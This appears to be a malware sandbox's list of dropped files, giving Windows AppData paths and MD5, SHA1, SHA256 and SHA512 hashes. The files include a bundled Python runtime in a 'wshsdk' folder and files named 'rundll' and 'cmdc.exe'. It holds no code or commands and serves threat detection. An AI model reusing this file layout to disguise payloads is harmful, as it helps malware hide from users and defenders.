C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc

MD5 03d3708dcc5740c983e428fabd55476c
SHA1 6e8045d4fdb150cbf885fff20f96e324edb1d471
SHA256 e60f921238e15ea7a3ae3bf4b4ba2f0bfde132aa9280b1c43d9b29c0a550d4cc
SHA512 e82dc56b1bae343d9768d3e759d9bc57029744ab80063e7a5fa38700d1eca31ba413368d3eec38b32f9d617f887304321c750aa5c997b35f8e12fb38c01e1678

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc

MD5 40482cabf9e7b82a9da1d3e64870c0ae
SHA1 acf0a33b78536c5a522764e608c8c409c5d76dde
SHA256 869122db307fe53a32287c33cc423959704fdc6d092bdfe6a57a42cf2a7b0292
SHA512 ccdb81cfad8f137e54cd9c85c1e2dbeedf9c3e6eb7c79f29c1bc865647d821d735de8c44c31896aae04bee9a6bb1e4e1f9928ec83e1bed15d3b7ecc16d8cc981

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__init__.py

MD5 e41762ff7371b08f4787bb5666cec0fe
SHA1 f2f496e3e16604c6c74e0e79292d24c0c67c1094
SHA256 55fbea07195eeb30ec32ce693952aeedf9671b33ae394bb3a2e701bac78f2186
SHA512 81144f3df1a79e28ac16f45eb495aa72dbd10b1f0200ef03e3ed8e59d6574931065a292eb999db0d89e122be1cf370852d2b319a5d9ebe85660a5b858670a632

C:\Users\Admin\AppData\Roaming\rundll

MD5 ce13d4da41736e46777cfe0907465977
SHA1 ce9d3abcb8d4e67389276232e31ef9158535e845
SHA256 e50b0b241c2b2be4887458d7ffc06e9ce8df0b5811e14eb25af5eed8c5988136
SHA512 956d0a92f4f77873a7c4a65795eaceba6062bb9721537808fa98952465eec8903c19871340b09faece74c1a640c596a8e91cee934dd1fa67bd0915b8d411f000

C:\Users\Admin\AppData\Roaming\wshsdk\lib\site-packages\pywin32.pth

MD5 79e95b45f12d9bca112cc386ada976bd
SHA1 19603a5f4b8a91e4ce35f7dff29b107959ff4353
SHA256 4daf949d99445bc0786a4335bd3438a7c9dc3bddff734af8f46d1be983aebc5b
SHA512 63d1fac801f7a5673005bb8c0a235a7c3937a1f7dfeb61373549f39029c336b4a643a30c4163eac5114ede11e19084bb86a3f915a9024152832e706b8d339e2e

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc

MD5 d63d385c9848e4123f7eb346d9449a2c
SHA1 bef682e2f8db3335b2bff3f6e7429212d291f7ae
SHA256 a05774c91a4a770426a225851c5564bde8540c14ebb220d3801066e0b5f499bc
SHA512 9deb42537ca9145896e54a5c2f27c4af812367761682b6d495d2b94db5a9decfb43964595f186c3159e011865a3e85788bc508f2a655b2adc83310b858841499

C:\Users\Admin\AppData\Roaming\wshsdk\lib\_sitebuiltins.py

MD5 385fa756146827f7cf8d0cd67db9f4e8
SHA1 11121d9dc26c3524d54d061054fa2eeafd87a6f4
SHA256 f7d3f4f4fa0290e861b2eaeb2643ffaf65b18ab7e953143eafa18b7ec68dbf59
SHA512 23369ba61863f1ebe7be138f6666619eaabd67bb055c7f199b40a3511afe28758096b1297a14c84f5635178a309b9f467a644c096951cb0961466c629bf9e77c

C:\Users\Admin\AppData\Roaming\wshsdk\lib\datetime.py

MD5 30b0d9793b922b384c758b3893e37cc0
SHA1 283666afc48c7301b3371a32de1ebc1d75b12296
SHA256 d277b522c3380d2d7591a5cf4b404587733f44b234492d4a40a24ac00cbcee39
SHA512 75b7c2956d99fd2d2e088f0b30ebc4636c728dd365bdd9fbac0035a437beca18ef418da41ba85a19848791af9482c8be87e57adb429bbbb0346d28c84535c26f

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc

MD5 5cef9ebdb2ec46516b26f2b7500354a3
SHA1 61dd8502cd0e84c17d4106f98cf6c7057cfc9027
SHA256 bad1ac8e6845001340b4636ad76ee87c0fb46f3661e801f2d12e4ad35be0a780
SHA512 5696724a8c88ea7185bfaa38ee210f9c2e0f7a19b11dc853efea2fda34892fe5496de7f8c749245ce2846b145f4cbb143190c9c9b6c518e754c1ef08cf6630f9

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\dbapi2.py

MD5 ce5fb621fb76f7dbd4d9aa1c9c5401af
SHA1 b13087ceb44da12f2237f8f524fdcdb00b877773
SHA256 9cdb78f92dda0e5fd6e9e9e5d1aa48e015dd8d2d74f0fdd70074abbec3c337f3
SHA512 6241350c7624ec48de433a8b6b36f91cfea03213c525e758b0ca12438fa0d18df718df4f07a9a8249233de5e441e2fc8b4c2d67113a04957e3703857bf837360

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\datetime.cpython-37.pyc

MD5 d274a5dd4dd3feb2f65ee336c9548d74
SHA1 20f450741b52b06351ed92bd5e269e9fa9c5dec3
SHA256 0457afe9ebd9985060d34d2b8e078943da63ec594aabc6e1a43e6fcde9869283
SHA512 2a5a7a75d174cd6b2f6e07c4d8b9da3c410066828455c3a15326d7d0fcbe7753c99edb358faa1131b94f4962844d7a91b05ae70ec245671221b4a78a114d7dfd

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__init__.py

MD5 42992dc3fc6ce4b729d12cf10dd638f6
SHA1 f3b9c18817dba1b550075c60a73d4f9b0eba4e92
SHA256 e5e2f2699e7284d0040473e30ca5cddad73d416e0bfefa8503435f3cd592a347
SHA512 6acd6f66efc1109c819931a1f22170cd50f5fb6d08431077c7960662b1c15cb39ccdbff38754c4c2cc6b08173f46b816745b694b35eeac8f2af1e4ee99bd51b5

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc

MD5 d141c0d968ac9258fa866b3f6ecb97fd
SHA1 2a4b45d7d088b6b01d29b221777490a0261b5f80
SHA256 f7c60b424953785b2b6409b47bfe3a35a5ff6f62bb3bfffa55cb2f8b640dbf5e
SHA512 ff51022231fd6b1935f02b1f2acc278b006281183579067338cdbfb6a31f1fe90edc120168262aa26bf8c33b3a1cd3dc2ef2ddcfa327be149f3eab6579469a7d

C:\Users\Admin\AppData\Roaming\wshsdk\lib\operator.py

MD5 78e116343d01c521fb24e2659c0a9d83
SHA1 c301ed122b80577f1d205aa4df351d437c5921d1
SHA256 bbb2c2bacda61b6285aa7cf5d01fac5cca923da1e74e5a639a64e6d0c390374f
SHA512 02b7fff93e9d3034b1c79a97b600cef861f13a3994738db9f80de6a00474502c53f783b05c4a90e99d5c398dd03e763876236c1c4e531b9f6d82b901018cd3d6

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\operator.cpython-37.pyc

MD5 ff4c5b263bb822579bdee1376fb851eb
SHA1 d2cb876c87987da1234c95e019df1df4cbd6d0aa
SHA256 6c29498b0029a6cd551ca13c834538612c1593957e3a24125a6dee3e0cc2cba6
SHA512 fe966afa9cd88668f7f70f5124b57dc12ef93eed820107cc2ea984e05338c4e950b124a0c2b65278a026d0bfd3b1bf8f70a64c334ab6062565b507a56df4f24d

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\keyword.cpython-37.pyc

MD5 da763671f0160b9f571003fde07dec9a
SHA1 4a286eebcd9bbe0576b31c69df50bba3c485a2fd
SHA256 5fcd817bf2e7eb7946607bf623b4bd8e4b1e521a3da497f789c8edb8a1c74543
SHA512 07b932b5770d4e7da4883b4bda3b29a325c37bbf52dc1a28f9a87fab8c4171c5b73a3fca1c5e4c99ca3e1ec9c38b9fa431e232afb8d866251020f9996de2b76c

C:\Users\Admin\AppData\Roaming\wshsdk\lib\keyword.py

MD5 e10039ee46ca3a037c36fb4fe2d348a1
SHA1 093849f03f400c6099ea230c58ee25c6c0868879
SHA256 607866ba74c3dce095495b84fa759d3275f597e9eee7728469beebea03ebe663
SHA512 6b3afe82aa59c97ec98025fb249ca14a67484a3b59b32a6a4d1cf9d3e390d4aef7d7f5c1b2170b9548cc84a91f27b65a752b6f3e18647387e7c196302abfec36

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\heapq.cpython-37.pyc

MD5 1681ab131133eef44819a77e7521bba4
SHA1 9957107388dc3f3d46e1c8093b6f199e976ad3d4
SHA256 97949f265b51c2766238eb61570988c0770eaebc2a1d1dbf349cacecadfd499a
SHA512 051142c93f379f394fe053b626673745c76ec0939e7589965da7ae1ff1ee6ec2dce901338cc282711690e34e9802cef606a1931611f16e313b7be4b7a259a540

C:\Users\Admin\AppData\Roaming\wshsdk\lib\heapq.py

MD5 748fea41945fae2079c769807a3bc281
SHA1 a665cfa7f24d747c543619eb21fa2bedf487a596
SHA256 7530073f951eff4111912daf3ed0842e19a1b22fddee5d5e3650004c0163672c
SHA512 841ff79e508459ddcf2e0117aa30827eaa487909a8bbafab37e76be38950b24997d2615e7f856f6f3eae32e82921b456aec7e06bb9955df1873462572c5c8ef9

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc

MD5 5d709db3aaadd7aa8d2a5ebfb423b88a
SHA1 a28b23e1d7dd4e4021b006c741ee2f39e35d3b1e
SHA256 50b9531629f24237b418b36f60847ce1ba7bcf212732e1817057cbb6c5d4b869
SHA512 c9922fc3b35652f13db5505e4fe17ddadfac0b9ac1e2ea010cc1cffc23358b364fd97f5196629e50ceb9f33c3e8957237cae9954349b394f4948ea94e9749178

C:\Users\Admin\AppData\Roaming\wshsdk\lib\reprlib.py

MD5 e7c51384148475bffeb9729df4b33b69
SHA1 58109e3ae253b6f9bf94bd8a2c880beae0eddf94
SHA256 3be6cde6103319b3ca44bbc4d40c60e0bcb14a53e93e2578e8e4e850f4a8c66b
SHA512 a7c81fd784e537da08a8ead5a6c635b66123de815b73fae2b9f1662cf49af4c9e41e648075cc0ee2a64c034fa38da4a4e90163e9b955b17d20490eeb86004341

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc

MD5 5d1314863e53a9951f489867ca048b85
SHA1 6642cc7962629a663ae4b6d927b2c5aba6c6d9ca
SHA256 bcd1d3d63d6e96a24917e2a82e59e1238fef1f1440ba7a025aaca5ce1ab8f05f
SHA512 c635c0eaf1af3dab30bc9fb325e05532aafdba318f16caeaf0f88b0e3363f229d6634c4315da7da54d53380d1275186d7d42528df307d73f4eaf2b5bc0ca8a18

C:\Users\Admin\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd

MD5 4b8730287334ede5c8b57806a9ef9a84
SHA1 22adf4b46a654c4d2c059c62b78316aa94b59b06
SHA256 c35fec7fdc168441395d0ed62c298fb21deaac569afc35c4887efbd4e20e1908
SHA512 302bcd03ab8bc45767ca9f842cfca984163516453c7e5627304ec18b4d7dc59a5fb49786ec8a44d761548ae823b5d2d81401a6b6226aab1e447d2422d3acd5db

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\abc.py

MD5 d2ce426d398d733c0a197c1d846fa1b4
SHA1 ee614fc3620309f2b262e2f2dfd4b8d486627980
SHA256 cc6056f06c8ddcf59f142fcba8b2f8fd45fd4e56c3de4f705b96b15d3482d1dd
SHA512 9058e80053fac97dd85a8a4835caaf9a8aa0ed29f6d3bbe20d92f44145ba1a92de2dc494b7de763caabc9af4015619e873520cf8f2e83ad9cef193fc2abb1fe1

C:\Users\Admin\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd

MD5 4b8730287334ede5c8b57806a9ef9a84
SHA1 22adf4b46a654c4d2c059c62b78316aa94b59b06
SHA256 c35fec7fdc168441395d0ed62c298fb21deaac569afc35c4887efbd4e20e1908
SHA512 302bcd03ab8bc45767ca9f842cfca984163516453c7e5627304ec18b4d7dc59a5fb49786ec8a44d761548ae823b5d2d81401a6b6226aab1e447d2422d3acd5db

C:\Users\Admin\AppData\Roaming\wshsdk\python3.dll

MD5 e210598de0897ecf2687a1f0c5254b7a
SHA1 8e193750d3765212ea19745bd43179dac2c1adb1
SHA256 b23958790ee314e6c421fc4aadd772b5a4aa1a4c5724353f5438d034299bee4a
SHA512 84e48c58e8f66b989b39f0dc665a0db416d863b003c13d32cd718a1c23e28b3d03b5b3062ee9d41b4f06f474cc52e188f8ef7bc4971e2cc8d79028b44a46c411

C:\Users\Admin\AppData\Roaming\wshsdk\python3.dll

MD5 e210598de0897ecf2687a1f0c5254b7a
SHA1 8e193750d3765212ea19745bd43179dac2c1adb1
SHA256 b23958790ee314e6c421fc4aadd772b5a4aa1a4c5724353f5438d034299bee4a
SHA512 84e48c58e8f66b989b39f0dc665a0db416d863b003c13d32cd718a1c23e28b3d03b5b3062ee9d41b4f06f474cc52e188f8ef7bc4971e2cc8d79028b44a46c411

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\cmdc.exe.zip

MD5 a8e496443115a63697cb350f47ae1729
SHA1 a69779b57ecc8457e85066e7a5ab742c70ea653d
SHA256 6f3cf374a1aa961be87dde5aaeb1706d95cdcadbd1a4c961363e5ff33fab168d
SHA512 0c3c5504567912cfd8cf40664463cdc518ce6810bfd05af91ffee30b13f4e115a93f6faae8e5c8aa88ee91e2c3b4404126dbdfcffb82aa2625199e432a3cea9c

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349